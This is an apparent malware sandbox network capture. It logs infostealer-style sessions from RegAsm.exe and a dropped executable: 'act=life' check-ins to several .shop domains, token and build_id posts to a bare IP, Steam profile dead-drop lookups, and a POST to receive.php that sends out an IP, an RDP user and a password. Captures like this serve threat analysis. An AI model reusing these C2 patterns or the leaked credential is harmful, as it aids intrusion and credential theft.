2024-09-26 22:29:10 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: vozmeatillu.shop
2024-09-26 22:29:10 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:29:10 UTC	770	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:29:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hn8hnrgcfav0bi7oqej3mpt896; expires=Mon, 20 Jan 2025 16:15:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=efLFYQrZq%2FjcO796NRM3zSB9x27VYFwlw9SqRvL3Kck4GPDReIqYJ9lf%2Bi%2FZlDCEOPR3PxmyK1t3fVO1PulhXT%2F9kJTcaTb8gVaEwhGhawZPGDKRJb11glSKCaUX%2FL1zyi1J"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c96b0f4db944352-EWR
2024-09-26 22:29:10 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:29:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	57909	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:10 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFCFBFBFBKFIDHJKFCAF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:29:10 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 63 31 65 61 30 63 36 31 32 66 35 38 30 62 64 30 63 66 64 65 30 36 35 39 30 66 66 31 66 64 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 0d 0a 43 6f 6e 74 Data Ascii: ------BFCFBFBFBKFIDHJKFCAFContent-Disposition: form-data; name="token"e7c1ea0c612f580bd0cfde06590ff1fd------BFCFBFBFBKFIDHJKFCAFContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------BFCFBFBFBKFIDHJKFCAFCont
2024-09-26 22:29:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:29:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:29:11 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	57912	172.67.162.108	443	5480	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:11 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drawzhotdog.shop
2024-09-26 22:29:11 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:29:11 UTC	762	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:29:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sff9p7mnbtdalf7gn0utghbp0t; expires=Mon, 20 Jan 2025 16:15:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ccS8nOT1f0V2hjtPhOTm5OW%2BDX4o4FYrZwV3wlEFQw9U4zH4HZ05EIRZxdoUZ4p6yEmQga7YisIOZgiMfXwqlE5B3g2j6LVs0TLNT2nBBJms3IZqVLvxsslfAcnGTBAkkqvw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c96b0faffe94259-EWR
2024-09-26 22:29:11 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:29:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	57913	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:12 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:29:12 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 63 31 65 61 30 63 36 31 32 66 35 38 30 62 64 30 63 66 64 65 30 36 35 39 30 66 66 31 66 64 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 Data Ascii: ------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="token"e7c1ea0c612f580bd0cfde06590ff1fd------GHJKECAAAFHJECAAAEBFContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------GHJKECAAAFHJECAAAEBFCont
2024-09-26 22:29:12 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:29:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:29:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	57914	188.114.97.3	443	5480	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:12 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fragnantbui.shop
2024-09-26 22:29:12 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:29:12 UTC	770	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:29:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=v64lkk7k8h47q7sohqejmbl5ni; expires=Mon, 20 Jan 2025 16:15:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VR0a%2BST4fintBEXWI3BCBu4KAhdcG%2B2AV%2FvlupnMO3vGESw%2FudtAgcBZrRvW2pfZleyw2rz90iF%2BoL2iKH3oaFT2C6jlFuxsudFmxp2fW9s9kZQWe41BlNNhaC9ppSgNyuCr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c96b1015f034240-EWR
2024-09-26 22:29:12 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:29:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	57916	188.114.97.3	443	5480	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:13 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: stogeneratmns.shop
2024-09-26 22:29:13 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:29:13 UTC	774	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:29:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vaoq5hm9a59knmphjogavdv3hj; expires=Mon, 20 Jan 2025 16:15:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=chgWoMmL%2FZEufD30%2B2gbPBIVUu6vw3Hbz36eBdzN1Z0QzV4aBG5vyGsuTI3EplqwvTjPuEb7OSgEfPaOVW1oVDwuGvJovUnxldkva%2F%2BUPIlnj06ix5dDwpZlUguXs7vqlDfwROg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c96b107989741db-EWR
2024-09-26 22:29:13 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:29:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	57917	104.21.77.130	443	5480	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:14 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: reinforcenh.shop
2024-09-26 22:29:14 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:29:15 UTC	768	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:29:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rmdn6sejvhf96o09hn1v2rcile; expires=Mon, 20 Jan 2025 16:15:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fj0gunZUOBNDYARPzzPQyXO93W7XeNaHtaXVsEEyO3FpRz%2B6OazeY5RmsV7JuAokyD4ZKbm%2BW9m1nCtp2Yx906SgnNryJ%2FL6eP4kxmhND6oYonhGHHZnGXwpXilZ2E0O1xw9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c96b10e5d0b7279-EWR
2024-09-26 22:29:15 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:29:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	57918	104.102.49.254	443	5480	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:15 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-09-26 22:29:16 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 22:29:16 GMT Content-Length: 34663 Connection: close Set-Cookie: sessionid=73970cf6f3c78c3c2afcc9ab; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 22:29:16 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 22:29:16 UTC	16384	IN	Data Raw: 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 Data Ascii: ernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" a
2024-09-26 22:29:16 UTC	3765	IN	Data Raw: 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 Data Ascii: e info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content "><div class="p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	57919	172.67.128.144	443	5480	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:16 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ballotnwu.site
2024-09-26 22:29:16 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:29:17 UTC	772	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:29:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2rcmfdq6hg8t1g7lqaevgmdffa; expires=Mon, 20 Jan 2025 16:15:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cWEkfVA1mcUYVch996AQ8k1ys0Qtg6QUi7jUkrGXpiCAXHRy%2FJBhQQuarI3yMb8po6XacbCdPE%2Bt238GoSURb8A5bm806HRjHL6WpXLI%2B%2Bdgk1M0S14LkPRoxiZBIExy8g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c96b11d7ddf19c3-EWR
2024-09-26 22:29:17 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:29:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	57923	188.114.97.3	443	6240	C:\ProgramData\BKJKEBGDHD.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:35 UTC	165	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: hansgborn.eu Content-Length: 58 Expect: 100-continue Connection: Keep-Alive
2024-09-26 22:29:35 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-26 22:29:35 UTC	58	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 75 73 65 72 3d 52 44 50 55 73 65 72 5f 37 66 64 66 61 66 65 30 26 70 61 73 73 77 6f 72 64 3d 77 70 61 65 4f 6a 7a 6a 71 46 34 42 Data Ascii: ip=8.46.123.33&user=RDPUser_7fdfafe0&password=wpaeOjzjqF4B
2024-09-26 22:29:35 UTC	603	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:29:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iSuC2mU88xen2wvj0d%2BeSltidBMKd4LBNvAZ7nlzSe2h9N2uL6ru7VZxQrlQQk%2Fy81Hgcas2%2FmLYF5Ecb9k8igCPV01YRg2%2BbEj1leVGDCGd62TGmwb3EHxPhmKcC9c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c96b18eed4043e0-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	57925	104.102.49.254	443	3532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:45 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:29:46 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 22:29:46 GMT Content-Length: 34725 Connection: close Set-Cookie: sessionid=f66dc3ba4d6a3da51173582c; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 22:29:46 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 22:29:46 UTC	16384	IN	Data Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
